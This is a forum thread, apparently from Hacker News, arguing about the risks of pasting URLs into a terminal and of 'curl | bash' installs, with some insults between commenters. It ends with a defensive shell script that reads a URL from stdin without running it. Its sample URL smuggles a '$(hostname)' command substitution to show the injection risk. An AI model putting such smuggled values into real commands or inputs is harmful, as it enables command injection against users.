Clever, but I really hope nobody is going to blindly copy-paste-go! a URL like that. Especially if you're technical enough to use a terminal, you should know better.
Lots of legit projects encourage this practice. Especially with quotes, it's a reasonable expectation that you're getting a literal. Conversely, it's unreasonable to expect that everyone can parse shell escape strings in their brains.
Now this example wasn't exactly well camouflaged, but I'd not be surprised if you can make it much more innocent looking.
People go nuts about curl | bash but then grab random packages off pip/gem/npm/brew/VimPlug/packages.el/VS Code without so much as a second look and they can all run arbitrary code too.
If you curl | bash from http, you may get MITM'd because you're not checking the checksum. Most modern package managers at least check that what was downloaded is indeed what the original developer intended, so it's slightly better.
How is it possible to be so wrong on so many levels in just two sentences?
1. Your epistemic reasoning capabilities are broken (as in, why do you think people should know better?)
2. You are just adopting an ad-hoc philosophy based on how shells work. If interactive languages had separate text inputs instead of just parsing a stream of text from stdin, pasting would always be safe. One may be tempted to call this "UN*X braindamage".
3. You appear to possibly believe in "checking a URL before opening it" type voodoo as well, regardless of shell issues.
If a carpenter chops his fingers off, it's not the fault of the saw. People who use programs should be expected to know what's safe to put in and out. Having a base level expectation of competence for operators is normal.
A separate text input is just stdin by another name.
Yes, I believe people who paste URLs into the terminal should examine those URLs - you generally have to trim some stuff, quote, or rewrite things to make them useful. If you believe in wildly flinging data everywhere, good on you, I'd rather deal with easily avoidable problems such as demonstrated in TFA.
> If a carpenter chops his fingers off, it's not the fault of the saw.
That would be an effective argument, but this vile shit has existed for decades without being fixed, for no good reason. This saw is specifically designed to slice fingers off, rather than do useful work, for no reason.
> Having a base level expectation of competence for operators is normal.
UNIX expects perfection, while providing none of its own.
> A separate text input is just stdin by another name.
No, nitwit, it prevents in-band signalling, which is the entire problem here.
Anyway, I use Emacs for everything, and don't have these issues. With wget, I use -i - to enter multiple URLs at once, but it would also defeat this.
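The distinction argued over in the last comments (a URL typed as command-line text versus a URL supplied on a separate input, as with `wget -i -`) can be shown in a few lines of shell. This is an added example, not code from any comment in the thread; the function names `url_ok` and `safe_url` and the sample URL are constructed for illustration.

```shell
#!/bin/sh
# Added example: treat a pasted URL as data read from stdin, never as shell input.

# url_ok URL: succeed only for an http(s) URL without whitespace or control bytes.
# Characters such as $ ( ) ; & ' are legal in URLs (RFC 3986), so no character
# filter makes a URL safe to paste onto a command line; this check only rejects
# input that cannot be a plain URL (ESC sequences, blanks, other schemes).
url_ok() {
    case $1 in
        http://?*|https://?*) ;;
        *) return 1 ;;
    esac
    stripped=$(printf '%s' "$1" | LC_ALL=C tr -d '[:space:][:cntrl:]')
    [ "$stripped" = "$1" ]
}

# safe_url: read exactly one line from stdin and print it if it passes url_ok.
# `IFS= read -r` stores the bytes as-is: no word splitting, no backslash
# processing, no expansion. The shell parser never sees the line as code.
safe_url() {
    IFS= read -r url || [ -n "$url" ] || return 1
    url_ok "$url" || { echo "rejected: not a plain http(s) URL" >&2; return 2; }
    printf '%s\n' "$url"
}

# Constructed sample: all of it is legal URL syntax and also shell syntax.
sample='https://example.com/a?x=$(hostname)&y=1;echo'
printf '%s\n' "$sample" | safe_url    # printed verbatim, nothing is executed

# Interactive use (paste at the prompt of `read`, then press Enter):
#   url=$(safe_url) && wget "$url"
```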